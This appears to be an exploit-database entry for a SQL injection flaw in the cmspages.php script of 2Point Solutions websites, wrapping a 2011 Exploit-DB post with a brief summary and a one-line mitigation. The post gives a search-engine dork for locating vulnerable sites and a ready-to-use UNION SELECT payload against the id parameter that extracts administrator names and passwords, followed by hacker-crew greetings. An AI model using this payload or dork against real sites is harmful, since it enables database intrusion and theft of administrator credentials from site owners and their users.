2Point Solutions SQL Injection Vulnerability

vendor:

cmspages.php

by:

Newbie_Campuz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: cmspages.php

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

2Point Solutions SQL Injection Vulnerability

2Point Solutions (cmspages.php) SQL Injection Vulnerability is a vulnerability that allows an attacker to inject malicious SQL code into a vulnerable web application. The malicious code can be used to access, modify, or delete data from the database. The vulnerable URL is http://[target]/cmspages.php?id=[SQL], where [SQL] is the malicious SQL code. Demo: http://www.site.com/cmspages.php?id=-43+union+select 1,2,group_concat(FName,0x3a,password),4+from+admin--

Mitigation:

Input validation and parameterized queries can be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

=============================================
2Point Solutions SQL Injection Vulnerability
=============================================


#################################################################################################

[+] Exploit Title : 2Point Solutions (cmspages.php) SQL Injection Vulnerability

[+] Author : Newbie_Campuz

[+] Published: 2011-06-24 : 02.54 WIB

[+] Test On : Windows XP SP3 

[+] www.jatimcrew.org/

##################################################################################################

# Script Vendor Homepage:
# http://www.2pointsolutions.com/

[+]Dork: "2point solutions"  cmspages.php?id=

[+] SQL Injection


	http://[target]/cmspages.php?id=[SQL]

	
Demo : 	

http://www.site.com/cmspages.php?id=-43+union+select 1,2,group_concat(FName,0x3a,password),4+from+admin--

##################################################################################################
Thanks to Allah SWT n Nabi Muhammad SAW

Special Thanks to : 	
My Parent, My Brother n My Sisters
Byz9991, Doraemon, CrackerManado, Kenthot_cakep, Andalas_oku, Dim_Chaz, Shamus, Chapzha,  phoenixhaxor, mywisdom, 
inc0mpl3te, Pr3tty, newbie_043, KidDevilz, r1pp3rm4ya , XcyberX, flyff666, MISTERFRIBO, Osean, Vhacx,jamsh0ut, 
cybermuttaqin, k3m4ngi, afa, roentah, zh0mbh1e, techno_x46, cyberd0s, Ficarciruas, elfata, bhotar, edo_pranata
Mawar_JatimCrew, -Love Pink, Husna, Chibob_jatimcrew, kucing_raden... and YOU... !!!

All admin, momod, spamguard, staff and members Jatim Crew..
All admin, momod, spamguard, staff and members Xteamweb
All admin, momod, spamguard, staff and members crackermanado
All admin, momod, spamguard, staff and members Pekanbaru Cyber Team..

##################################################################################################